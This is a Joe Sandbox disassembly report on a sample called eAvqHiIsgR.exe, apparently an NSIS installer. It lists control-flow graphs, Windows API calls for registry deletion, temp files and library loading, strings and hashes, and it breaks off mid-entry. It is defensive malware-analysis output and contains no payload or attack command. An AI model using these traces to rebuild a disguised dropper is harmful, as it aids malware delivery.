                                                                control_flow_graph 275 40618a-406195 276 406197-4061a6 275->276 277 4061a8-4061be 275->277 276->277 278 4061c4-4061cf 277->278 279 4063af-4063b3 277->279 278->279 282 4061d5-4061dc 278->282 280 4061e1-4061eb 279->280 281 4063b9-4063c3 279->281 280->281 283 4061f1-4061f8 280->283 284 4063c5-4063c9 call 4060f7 281->284 285 4063ce-4063cf 281->285 282->279 286 4063a2 283->286 287 4061fe-406232 283->287 284->285 289 4063a4-4063aa 286->289 290 4063ac-4063ae 286->290 291 406238-406242 287->291 292 40634f-406352 287->292 289->279 290->279 293 406244-406248 291->293 294 40625c 291->294 295 406382-406385 292->295 296 406354-406357 292->296 293->294 297 40624a-40624e 293->297 300 406263-40626a 294->300 301 406393-4063a0 lstrlenA 295->301 302 406387-40638e call 40618a 295->302 298 406367-406373 call 4060f7 296->298 299 406359-406365 call 406055 296->299 297->294 303 406250-406254 297->303 313 406378-40637e 298->313 299->313 305 40626c-40626e 300->305 306 40626f-406271 300->306 301->279 302->301 303->294 309 406256-40625a 303->309 305->306 311 406273-40628e call 405fde 306->311 312 4062aa-4062ad 306->312 309->300 321 406293-406296 311->321 314 4062bd-4062c0 312->314 315 4062af-4062bb GetSystemDirectoryA 312->315 313->301 317 406380 313->317 319 4062c2-4062d0 GetWindowsDirectoryA 314->319 320 40632d-40632f 314->320 318 406331-406334 315->318 322 406347-40634d call 4063d2 317->322 318->322 325 406336-40633a 318->325 319->320 320->318 324 4062d2-4062dc 320->324 321->325 326 40629c-4062a5 call 40618a 321->326 322->301 329 4062f6-40630c SHGetSpecialFolderLocation 324->329 330 4062de-4062e1 324->330 325->322 327 40633c-406342 lstrcatA 325->327 326->318 327->322 334 40632a 329->334 335 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 329->335 330->329 333 4062e3-4062ea 330->333 336 4062f2-4062f4 333->336 334->320 335->318 335->334 336->318 336->329
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                • SHGetSpecialFolderLocation.SHELL32(00405256,771B23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                • SHGetPathFromIDListA.SHELL32(771B23A0,Call), ref: 00406312
                                                                • CoTaskMemFree.OLE32(771B23A0), ref: 0040631E
                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,771B23A0), ref: 00406394
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 717251189-1230650788
                                                                • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 406 401759-40177c call 402bce call 405afc 411 401786-401798 call 4060f7 call 405a8f lstrcatA 406->411 412 40177e-401784 call 4060f7 406->412 418 40179d-4017a3 call 4063d2 411->418 412->418 422 4017a8-4017ac 418->422 423 4017ae-4017b8 call 40646b 422->423 424 4017df-4017e2 422->424 432 4017ca-4017dc 423->432 433 4017ba-4017c8 CompareFileTime 423->433 426 4017e4-4017e5 call 405c6b 424->426 427 4017ea-401806 call 405c90 424->427 426->427 434 401808-40180b 427->434 435 40187e-4018a7 call 40521e call 4030d8 427->435 432->424 433->432 436 401860-40186a call 40521e 434->436 437 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 434->437 449 4018a9-4018ad 435->449 450 4018af-4018bb SetFileTime 435->450 447 401873-401879 436->447 437->422 471 401855-401856 437->471 451 402a63 447->451 449->450 453 4018c1-4018cc CloseHandle 449->453 450->453 454 402a65-402a69 451->454 456 4018d2-4018d5 453->456 457 402a5a-402a5d 453->457 459 4018d7-4018e8 call 40618a lstrcatA 456->459 460 4018ea-4018ed call 40618a 456->460 457->451 465 4018f2-402382 459->465 460->465 469 402387-40238c 465->469 470 402382 call 405813 465->470 469->454 470->469 471->447 472 401858-401859 471->472 472->436
                                                                APIs
                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp$C:\Users\user~1\AppData\Local\Temp\nsa617D.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                                • API String ID: 1941528284-2076470392
                                                                • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 473 4030d8-4030ec 474 4030f5-4030fe 473->474 475 4030ee 473->475 476 403100 474->476 477 403107-40310c 474->477 475->474 476->477 478 40311c-403129 call 4032ea 477->478 479 40310e-403117 call 403300 477->479 483 4032d8 478->483 484 40312f-403133 478->484 479->478 485 4032da-4032db 483->485 486 403283-403285 484->486 487 403139-403182 GetTickCount 484->487 490 4032e3-4032e7 485->490 488 4032c5-4032c8 486->488 489 403287-40328a 486->489 491 4032e0 487->491 492 403188-403190 487->492 493 4032ca 488->493 494 4032cd-4032d6 call 4032ea 488->494 489->491 495 40328c 489->495 491->490 496 403192 492->496 497 403195-4031a3 call 4032ea 492->497 493->494 494->483 506 4032dd 494->506 500 40328f-403295 495->500 496->497 497->483 505 4031a9-4031b2 497->505 503 403297 500->503 504 403299-4032a7 call 4032ea 500->504 503->504 504->483 510 4032a9-4032b5 call 405d37 504->510 509 4031b8-4031d8 call 406625 505->509 506->491 515 40327b-40327d 509->515 516 4031de-4031f1 GetTickCount 509->516 517 4032b7-4032c1 510->517 518 40327f-403281 510->518 515->485 519 4031f3-4031fb 516->519 520 403236-403238 516->520 517->500 521 4032c3 517->521 518->485 522 403203-403233 MulDiv wsprintfA call 40521e 519->522 523 4031fd-403201 519->523 524 40323a-40323e 520->524 525 40326f-403273 520->525 521->491 522->520 523->520 523->522 528 403240-403247 call 405d37 524->528 529 403255-403260 524->529 525->492 526 403279 525->526 526->491 533 40324c-40324e 528->533 530 403263-403267 529->530 530->509 534 40326d 530->534 533->518 535 403250-403253 533->535 534->491 535->530
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CountTick$wsprintf
                                                                • String ID: ... %d%%$HBB
                                                                • API String ID: 551687249-372310663
                                                                • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                                Control-flow Graph

                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401E38
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                • String ID: Calibri
                                                                • API String ID: 3808545654-1409258342
                                                                • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 549 4056e4-40572f CreateDirectoryA 550 405731-405733 549->550 551 405735-405742 GetLastError 549->551 552 40575c-40575e 550->552 551->552 553 405744-405758 SetFileSecurityA 551->553 553->550 554 40575a GetLastError 553->554 554->552
                                                                APIs
                                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727
                                                                • GetLastError.KERNEL32 ref: 0040573B
                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                • GetLastError.KERNEL32 ref: 0040575A
                                                                Strings
                                                                • C:\Users\user\Desktop, xrefs: 004056E4
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040570A
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                • API String ID: 3449924974-2752704311
                                                                • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 555 406492-4064b2 GetSystemDirectoryA 556 4064b4 555->556 557 4064b6-4064b8 555->557 556->557 558 4064c8-4064ca 557->558 559 4064ba-4064c2 557->559 561 4064cb-4064fd wsprintfA LoadLibraryExA 558->561 559->558 560 4064c4-4064c6 559->560 560->561
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                • wsprintfA.USER32 ref: 004064E2
                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                • API String ID: 2200240437-4240819195
                                                                • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 562 405cbf-405cc9 563 405cca-405cf5 GetTickCount GetTempFileNameA 562->563 564 405d04-405d06 563->564 565 405cf7-405cf9 563->565 567 405cfe-405d01 564->567 565->563 566 405cfb 565->566 566->567
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405CD3
                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                Strings
                                                                • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 00405CBF
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CC2
                                                                • nsa, xrefs: 00405CCA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-1962293139
                                                                • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 568 402cd0-402cf9 call 405f7d 570 402cfe-402d02 568->570 571 402db3-402db7 570->571 572 402d08-402d0c 570->572 573 402d31-402d44 572->573 574 402d0e-402d2f RegEnumValueA 572->574 576 402d6d-402d74 RegEnumKeyA 573->576 574->573 575 402d98-402da6 RegCloseKey 574->575 575->571 577 402d46-402d48 576->577 578 402d76-402d88 RegCloseKey call 406500 576->578 577->575 579 402d4a-402d5e call 402cd0 577->579 584 402da8-402dae 578->584 585 402d8a-402d96 RegDeleteKeyA 578->585 579->578 586 402d60-402d6c 579->586 584->571 585->571 586->576
                                                                APIs
                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CloseEnum$DeleteValue
                                                                • String ID:
                                                                • API String ID: 1354259210-0
                                                                • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 587 701a16db-701a1717 call 701a1a98 591 701a171d-701a1721 587->591 592 701a1834-701a1836 587->592 593 701a172a-701a1737 call 701a22f1 591->593 594 701a1723-701a1729 call 701a22af 591->594 599 701a1739-701a173e 593->599 600 701a1767-701a176e 593->600 594->593 603 701a1759-701a175c 599->603 604 701a1740-701a1741 599->604 601 701a178e-701a1792 600->601 602 701a1770-701a178c call 701a24d8 call 701a1559 call 701a1266 GlobalFree 600->602 609 701a17dc-701a17e2 call 701a24d8 601->609 610 701a1794-701a17da call 701a156b call 701a24d8 601->610 626 701a17e3-701a17e7 602->626 603->600 605 701a175e-701a175f call 701a2cc3 603->605 607 701a1749-701a174a call 701a2a38 604->607 608 701a1743-701a1744 604->608 618 701a1764 605->618 621 701a174f 607->621 614 701a1751-701a1757 call 701a26b2 608->614 615 701a1746-701a1747 608->615 609->626 610->626 625 701a1766 614->625 615->600 615->607 618->625 621->618 625->600 630 701a17e9-701a17f7 call 701a249e 626->630 631 701a1824-701a182b 626->631 637 701a17f9-701a17fc 630->637 638 701a180f-701a1816 630->638 631->592 633 701a182d-701a182e GlobalFree 631->633 633->592 637->638 639 701a17fe-701a1806 637->639 638->631 640 701a1818-701a1823 call 701a14e2 638->640 639->638 641 701a1808-701a1809 FreeLibrary 639->641 640->631 641->638
                                                                APIs
                                                                  • Part of subcall function 701A1A98: GlobalFree.KERNEL32(?), ref: 701A1D09
                                                                  • Part of subcall function 701A1A98: GlobalFree.KERNEL32(?), ref: 701A1D0E
                                                                  • Part of subcall function 701A1A98: GlobalFree.KERNEL32(?), ref: 701A1D13
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A1786
                                                                • FreeLibrary.KERNEL32(?), ref: 701A1809
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A182E
                                                                  • Part of subcall function 701A22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 701A22E0
                                                                  • Part of subcall function 701A26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701A1757,00000000), ref: 701A2782
                                                                  • Part of subcall function 701A156B: wsprintfA.USER32 ref: 701A1599
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                • String ID:
                                                                • API String ID: 3962662361-3916222277
                                                                • Opcode ID: 041def73e7fbf907d53e04847511ff5377ced520ccea6247858ae29b90841048
                                                                • Instruction ID: dec6b5aad2fc37e65ad2aef9d44499455f1c795cad9223c85fc55abd052016c1
                                                                • Opcode Fuzzy Hash: 041def73e7fbf907d53e04847511ff5377ced520ccea6247858ae29b90841048
                                                                • Instruction Fuzzy Hash: 0F41D4FA0002049BCB019FB8CD85B9E37ACBF15220F169479F907AAA96DF749445C7A0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 644 401c2e-401c4e call 402bac * 2 649 401c50-401c57 call 402bce 644->649 650 401c5a-401c5e 644->650 649->650 652 401c60-401c67 call 402bce 650->652 653 401c6a-401c70 650->653 652->653 656 401c72-401c8e call 402bac * 2 653->656 657 401cbe-401ce4 call 402bce * 2 FindWindowExA 653->657 668 401c90-401cac SendMessageTimeoutA 656->668 669 401cae-401cbc SendMessageA 656->669 667 401cea 657->667 670 401ced-401cf0 667->670 668->670 669->667 671 401cf6 670->671 672 402a5a-402a69 670->672 671->672
                                                                APIs
                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                Strings
                                                                Memory Dump Source
